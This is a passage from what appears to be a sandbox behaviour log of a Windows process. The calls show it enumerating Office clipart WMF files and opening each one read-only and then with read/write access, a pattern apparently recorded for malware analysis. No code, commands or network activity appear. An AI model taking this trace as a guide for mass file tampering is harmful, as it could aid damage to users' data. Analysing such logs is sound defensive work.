ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x70c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01173_.WMF", cAlternateFileName="")) returned 1 [0104.157] AreFileApisANSI () returned 1 [0104.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01173_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01173_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.157] AreFileApisANSI () returned 1 [0104.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.157] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01173_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.159] GetFileType (hFile=0x33c) returned 0x1 [0104.159] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.159] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.159] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.159] CloseHandle (hObject=0x33c) returned 1 [0104.160] AreFileApisANSI () returned 1 [0104.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.160] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01173_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.160] GetFileType (hFile=0x33c) returned 0x1 [0104.160] CloseHandle (hObject=0x33c) returned 1 [0104.160] AreFileApisANSI () returned 1 [0104.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.160] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01173_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebfae8f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebfae8f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebfae8f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x70c)) returned 1 [0104.160] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdbe306f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x760, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01176_.WMF", cAlternateFileName="")) returned 1 [0104.160] AreFileApisANSI () returned 1 [0104.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01176_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01176_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.160] AreFileApisANSI () returned 1 [0104.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.160] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01176_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.161] GetFileType (hFile=0x33c) returned 0x1 [0104.161] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.161] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.161] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.161] CloseHandle (hObject=0x33c) returned 1 [0104.161] AreFileApisANSI () returned 1 [0104.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.161] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01176_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.161] GetFileType (hFile=0x33c) returned 0x1 [0104.161] CloseHandle (hObject=0x33c) returned 1 [0104.161] AreFileApisANSI () returned 1 [0104.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.161] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01176_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdbe306f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x760)) returned 1 [0104.161] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb3c2ce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xed4, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01178_.WMF", cAlternateFileName="")) returned 1 [0104.161] AreFileApisANSI () returned 1 [0104.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01178_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01178_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.162] AreFileApisANSI () returned 1 [0104.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.162] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01178_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01178_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.162] GetFileType (hFile=0x33c) returned 0x1 [0104.162] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.162] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.162] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.162] CloseHandle (hObject=0x33c) returned 1 [0104.162] AreFileApisANSI () returned 1 [0104.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.162] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01178_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01178_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.162] GetFileType (hFile=0x33c) returned 0x1 [0104.162] CloseHandle (hObject=0x33c) returned 1 [0104.163] AreFileApisANSI () returned 1 [0104.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.163] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01178_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01178_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb3c2ce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xed4)) returned 1 [0104.163] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb3c2ce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7e8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01179_.WMF", cAlternateFileName="")) returned 1 [0104.163] AreFileApisANSI () returned 1 [0104.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01179_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01179_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.163] AreFileApisANSI () returned 1 [0104.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.163] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01179_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01179_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.163] GetFileType (hFile=0x33c) returned 0x1 [0104.163] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.163] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.163] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.163] CloseHandle (hObject=0x33c) returned 1 [0104.163] AreFileApisANSI () returned 1 [0104.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.164] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01179_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01179_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.164] GetFileType (hFile=0x33c) returned 0x1 [0104.164] CloseHandle (hObject=0x33c) returned 1 [0104.164] AreFileApisANSI () returned 1 [0104.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.164] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01179_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01179_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb3c2ce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7e8)) returned 1 [0104.164] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb3c2ce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x824, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01180_.WMF", cAlternateFileName="")) returned 1 [0104.164] AreFileApisANSI () returned 1 [0104.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01180_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01180_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.164] AreFileApisANSI () returned 1 [0104.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.164] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01180_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01180_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.165] GetFileType (hFile=0x33c) returned 0x1 [0104.165] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.165] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.165] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.165] CloseHandle (hObject=0x33c) returned 1 [0104.165] AreFileApisANSI () returned 1 [0104.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.165] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01180_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01180_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.165] GetFileType (hFile=0x33c) returned 0x1 [0104.166] CloseHandle (hObject=0x33c) returned 1 [0104.166] AreFileApisANSI () returned 1 [0104.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.166] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01180_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01180_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb3c2ce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x824)) returned 1 [0104.166] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5a8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01181_.WMF", cAlternateFileName="")) returned 1 [0104.166] AreFileApisANSI () returned 1 [0104.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01181_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01181_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.166] AreFileApisANSI () returned 1 [0104.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.166] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01181_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01181_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.166] GetFileType (hFile=0x33c) returned 0x1 [0104.167] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.167] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.167] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.167] CloseHandle (hObject=0x33c) returned 1 [0104.167] AreFileApisANSI () returned 1 [0104.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.167] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01181_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01181_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.167] GetFileType (hFile=0x33c) returned 0x1 [0104.167] CloseHandle (hObject=0x33c) returned 1 [0104.167] AreFileApisANSI () returned 1 [0104.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.167] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01181_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01181_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5a8)) returned 1 [0104.167] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdbe306f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbb4, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01182_.WMF", cAlternateFileName="")) returned 1 [0104.167] AreFileApisANSI () returned 1 [0104.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01182_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01182_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.167] AreFileApisANSI () returned 1 [0104.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.168] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01182_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01182_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.168] GetFileType (hFile=0x33c) returned 0x1 [0104.168] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.168] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.168] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.168] CloseHandle (hObject=0x33c) returned 1 [0104.168] AreFileApisANSI () returned 1 [0104.168] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01182_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01182_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.168] GetFileType (hFile=0x33c) returned 0x1 [0104.168] CloseHandle (hObject=0x33c) returned 1 [0104.169] AreFileApisANSI () returned 1 [0104.169] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01182_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01182_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdbe306f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbb4)) returned 1 [0104.169] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8f8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01183_.WMF", cAlternateFileName="")) returned 1 [0104.169] AreFileApisANSI () returned 1 [0104.169] WideCharToMultiByte 